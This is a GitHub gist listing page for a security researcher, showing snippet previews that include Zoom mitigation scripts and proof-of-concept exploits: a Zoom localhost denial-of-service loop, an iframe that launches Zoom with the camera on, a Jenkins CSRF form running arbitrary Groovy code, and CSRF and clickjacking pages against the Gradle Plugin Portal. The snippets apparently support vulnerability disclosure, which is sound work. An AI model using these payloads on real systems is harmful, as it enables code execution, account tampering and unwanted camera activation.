Skip to content

Instantly share code, notes, and snippets.

View JLLeitschuh's full-sized avatar

Jonathan Leitschuh JLLeitschuh

736 followers · 71 following
View GitHub Profile
@JLLeitschuh
JLLeitschuh / CVE Numbers.md
Last active October 30, 2019 18:22
@JLLeitschuh
JLLeitschuh / disable_video_by_default_for_zoom.sh
Created July 9, 2019 00:01
# For just your local account
defaults write ~/Library/Preferences/us.zoom.config.plist ZDisableVideo 1
# For all users on the machine
sudo defaults write /Library/Preferences/us.zoom.config.plist ZDisableVideo 1
@JLLeitschuh
JLLeitschuh / permanent_zoom_server_remover.sh
Created July 8, 2019 23:17
Permanently removes the Zoom localhost webserver and prevents it from being reinstalled in the future.
rm -rf ~/.zoomus
touch ~/.zoomus
@JLLeitschuh
JLLeitschuh / zoom_poc_dos.html
Created July 7, 2019 04:01
Denial of service POC for Zoom
<body>
<script>
// It's actually better if this number isn't a valid zoom number.
var attackNumber = "694138052"
setInterval(function(){
var image = document.createElement("img");
// Use a date to bust the browser's cache
var date = new Date();
image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime();
@JLLeitschuh
JLLeitschuh / zoom_poc_iframe.html
Created July 8, 2019 13:58
Simple POC that launches Zoom on Mac with your video camera activated using an iframe.
<iframe src="https://zoom.us/j/492468757"/>
@JLLeitschuh
JLLeitschuh / zoom_simple.txt
Created July 7, 2019 02:10
Simple example of the Zoom Vunlerability
http://localhost:19421/launch?action=join&confno=[some confrence number]
@JLLeitschuh
JLLeitschuh / UploadToArtifactory.kt
Created June 13, 2019 17:48
Gradle Plugin Build logic to upload single files to JFrog Artifactory
/* ****************************************************************************** */
// MIT License
//
// Copyright (c) 2019 Hewlett Packard Enterprise Development LP
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
@JLLeitschuh
JLLeitschuh / jenkins-csrf.html
Created February 21, 2019 17:51
Demonstrates CSRF Remote Code Execution attack against a Jenkins Instance that has CSRF protection disabled.
<html>
<body>
<form action="http://corperate-jenkins.lab.com:8080/script" method="POST">
<input type="hidden" name="script"
value="println 'Hello! I just ran an arbitrary bit of code on Jenkins!'; println Jenkins.instance.slaves"/>
<input type="submit" value="Submit!"/>
</form>
</body>
</html>
@JLLeitschuh
JLLeitschuh / plugin-portal-csrf.html
Created November 1, 2018 17:58
Demonstrates CSRF against the Gradle Plugin Portal user account page
<?xml version="1.0" encoding="UTF-8"?>
<html>
<head></head>
<body>
<form action="https://plugins.gradle.org/user" method="POST" class="edit-profile-form" _lpchecked="1">
<dl id="name_field">
<dt>
<label for="name"></label>
</dt>
<dd>
@JLLeitschuh
JLLeitschuh / plugin-portal-clickjack.html
Created November 1, 2018 15:53
Demonstrates Clickjacking against the Gradle Plugin Portal user account page
<html>
<head>
<style>
iframe { /* iframe from the victim site */
width: 400px;
height: 100px;
position: absolute;
top: 0;
left: -20px;
opacity: 0.5; /* in real opacity:0 */